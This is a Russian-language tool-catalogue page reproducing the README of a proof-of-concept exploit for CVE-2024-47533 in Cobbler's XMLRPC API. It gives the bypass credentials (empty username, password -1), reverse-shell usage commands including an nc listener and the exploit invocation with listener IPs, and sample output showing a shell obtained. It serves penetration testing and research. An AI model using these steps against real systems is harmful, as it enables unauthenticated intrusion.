Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-47533-PoC — Доказательство концепции эксплуатации для CVE-2024-47533 — неаутентифицированный обход аутентификации в XMLRPC API Cobbler, приводящий к удалённому выполнению кода через внедрённую обратную оболочку. | Kitploit
Инструменты/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Аутентификация и авторизацияЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

Доказательство концепции эксплуатации для CVE-2024-47533 — неаутентифицированный обход аутентификации в XMLRPC API Cobbler, приводящий к удалённому выполнению кода через внедрённую обратную оболочку.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
131 год назадЕщё не проверено

CVE-2024-47533 – Обход аутентификации Cobbler XMLRPC → Обратная оболочка (RCE без аутентификации)

📌 Краткое описание

Этот репозиторий содержит эксплойт Proof-of-Concept (PoC) для CVE-2024-47533,
критического обхода аутентификации в XMLRPC API Cobbler, приводящего к удаленному выполнению кода (RCE) без аутентификации.

Эксплойт использует уязвимость метода login() в XMLRPC API для обхода аутентификации и внедрения команды обратной оболочки через background_import().


⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных, исследовательских целей и авторизованного тестирования на проникновение.
НЕ используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.
Автор не несет ответственности за неправомерное использование или ущерб.


🛠 Технические детали

  • Тип уязвимости: Authentication Bypass → RCE
  • Затронутый компонент: Cobbler XMLRPC API
  • Вектор атаки: Network
  • Требуемые привилегии: None
  • Взаимодействие пользователя: None

Основная причина:
utils.get_shared_secret() некорректно возвращает -1 из-за неправильной обработки чтения файла в бинарном режиме с кодировкой, что позволяет аутентификацию с пустым именем пользователя и -1 в качестве пароля.

Воздействие:
Злоумышленник может:

  • Получить доступ к API на уровне администратора
  • Внедрять произвольные системные команды в шаблоны Cobbler
  • Запустить обратную оболочку на цели

🚀 Использование

1️⃣ Клонировать репозиторий

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ Настроить слушатель

На вашей атакующей машине:

root@kitploit:~
nc -lvnp 4444

3️⃣ Запустить эксплойт

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

Пример:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 Структура файлов

root@kitploit:~
.
├── CVE-2024-47533.py  # Скрипт эксплойта обратной оболочки
└── README.md          # Документация

📸 Пример вывода

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.

🧑‍💻 Автор

00xCanelo
Профиль GitHub


📚 Ссылки

  • NVD: CVE-2024-47533
  • Проект Cobbler на GitHub
Скачать инструмент